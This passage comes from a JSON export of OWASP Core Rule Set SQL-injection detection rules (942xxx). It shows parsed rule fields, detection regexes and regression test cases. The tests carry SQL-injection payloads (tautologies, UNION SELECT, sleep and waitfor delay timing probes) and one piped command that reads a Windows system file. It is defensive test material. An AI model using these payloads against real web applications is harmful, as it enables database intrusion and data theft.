"OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 17, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 17, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 17 } }, { "rule_id": "942012", "has_tests": false, "detection": { "variables": [ { "name": "TX", "part": "DETECTION_PARANOIA_LEVEL", "negated": false } ], "operator": { "type": "@lt", "argument": "1", "negated": false } }, "transformations": [], "metadata": { "phase": "2", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [], "severity": null, "tags": [ "OWASP_CRS" ] }, "test_cases": [], "raw_rule": { "type": "SecRule", "lineno": 18, "variables": [ { "variable": "TX", "variable_part": "DETECTION_PARANOIA_LEVEL", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@lt", "operator_argument": "1", "actions": [ { "act_name": "id", "lineno": 18, "act_quote": "no_quote", "act_arg": "942012", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 18, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "pass", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "nolog", "lineno": 18, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 18, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "skipAfter", "lineno": 18, "act_quote": "no_quote", "act_arg": "END-REQUEST-942-APPLICATION-ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 18 } }, { "rule_id": "942100", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "REQUEST_HEADERS", "part": "User-Agent", "negated": false }, { "name": "REQUEST_HEADERS", "part": "Referer", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@detectSQLi", "argument": "", "negated": false } }, "transformations": [ "none", "utf8toUnicode", "urlDecodeUni", "removeNulls" ], "metadata": { "phase": "2", "message": "SQL Injection Attack Detected via libinjection", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Simple SQL Injection", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=1234 OR 1=1" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=1234 OR 1=1" } ] }, { "description": "Simple SQL injection", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=-1839' or '1'='1" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=-1839' or '1'='1" } ] }, { "description": "Simple SQL injection", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=-1839\" or \"1\"=\"2" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=-1839\" or \"1\"=\"2" } ] }, { "description": "Basic SQL injection", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=2010-01-01'+sleep(20.to_i)+'" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=2010-01-01'+sleep(20.to_i)+'" } ] }, { "description": "Simple SQL injection", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=EmptyValue' and 526=527" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=EmptyValue' and 526=527" } ] }, { "description": "Simple SQL injection", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo') UNION ALL select NULL --" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo') UNION ALL select NULL --" } ] }, { "description": "Advanced SQL injection", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=foo')waitfor%20delay'5%3a0%3a20'--" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=foo')waitfor%20delay'5%3a0%3a20'--" } ] }, { "description": "Simple SQL Injection", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=JKGHUKGDI8TDHLFJH72FZLFJSKFH' and sleep(12) --" } ] }, { "description": "Simple SQL injection", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=/path/to/file/unitests.txt') UNION ALL select NULL --" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=/path/to/file/unitests.txt') UNION ALL select NULL --" } ] }, { "description": "Advanced SQL Injection", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "1'||(select extractvalue(xmltype('%toyop;" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "1'||(select extractvalue(xmltype('%toyop;" } ] }, { "description": "Simple function call", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=sleep(20)" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=sleep(20)" } ] }, { "description": "Advanced SQL injection", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=unittests@coreruleset.org\" sleep(10.to_i) \"" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=unittests@coreruleset.org\" sleep(10.to_i) \"" } ] }, { "description": "Advanced injection", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\" | type %SystemDrive%\\\\config.ini | \"" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\" | type %SystemDrive%\\\\config.ini | \"" } ] }, { "description": "Advanced SQL injection", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" }, "expected": { "should_block": true, "rule_ids": [ 942100 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\"unittests@coreruleset.org\"')) and (select*from(select(sleep(5)))x) --" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 46, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "User-Agent", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_HEADERS", "variable_part": "Referer", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@detectSQLi", "operator_argument": "", "actions": [ { "act_name": "id", "lineno": 47, "act_quote": "no_quote", "act_arg": "942100", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 48, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 49, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 50, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 51, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 51, "act_quote": "no_quote", "act_arg": "utf8toUnicode", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 51, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 51, "act_quote": "no_quote", "act_arg": "removeNulls", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 52, "act_quote": "quotes", "act_arg": "SQL Injection Attack Detected via libinjection", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 53, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 54, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 55, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 56, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 57, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 58, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 59, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 60, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 61, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 62, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 63, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "multiMatch", "lineno": 64, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 65, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 66, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 46 } }, { "rule_id": "942140", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:d(?:atabas|b_nam)e[^0-9A-Z_a-z]*\\(|(?:information_schema|m(?:aster\\.\\.sysdatabases|s(?:db|ys(?:ac(?:cess(?:objects|storage|xml)|es)|modules2?|(?:object|querie|relationship)s))|ysql\\.db)|northwind|pg_(?:catalog|toast)|tempdb)\\b|s(?:chema(?:_name\\b|[^0-9A-Z_a-z]*\\()|(?:qlite_(?:temp_)?master|ys(?:aux|\\.database_name))\\b))", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack: Common DB Names Detected", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 1, "request": { "method": "GET", "uri": "/get?sql_table=pg_catalog", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=pg_catalog" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "INFORMATION_SCHEMA" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "INFORMATION_SCHEMA" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "database(" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "database(" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "db_name(" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "db_name(" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "DaTaBasE(" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "DaTaBasE(" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "InFoRmaTioN_ScHemA" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "InFoRmaTioN_ScHemA" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "DB_NAME(" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "DB_NAME(" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "tempdb" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "tempdb" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "msdb" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "msdb" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "mysql.db" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "mysql.db" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "MSysAccessObjects" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "MSysAccessObjects" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "Northwind" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "Northwind" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "northwind" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "northwind" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "SCHEMA_NAME" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "SCHEMA_NAME" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "DATABASE(" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "DATABASE(" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "schema_name" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "schema_name" } ] }, { "description": "SQL Injection Attack: Common DB Names Detected", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "information_schema" }, "expected": { "should_block": true, "rule_ids": [ 942140 ] }, "malicious_patterns": [ { "location": "post_body", "value": "information_schema" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 77, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)\\b(?:d(?:atabas|b_nam)e[^0-9A-Z_a-z]*\\(|(?:information_schema|m(?:aster\\.\\.sysdatabases|s(?:db|ys(?:ac(?:cess(?:objects|storage|xml)|es)|modules2?|(?:object|querie|relationship)s))|ysql\\.db)|northwind|pg_(?:catalog|toast)|tempdb)\\b|s(?:chema(?:_name\\b|[^0-9A-Z_a-z]*\\()|(?:qlite_(?:temp_)?master|ys(?:aux|\\.database_name))\\b))", "actions": [ { "act_name": "id", "lineno": 78, "act_quote": "no_quote", "act_arg": "942140", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 79, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 80, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 81, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 82, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 82, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 83, "act_quote": "quotes", "act_arg": "SQL Injection Attack: Common DB Names Detected", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 84, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 85, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 86, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 87, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 88, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 89, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 90, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 91, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 92, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 93, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 94, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 95, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 96, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 77 } }, { "rule_id": "942151", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": 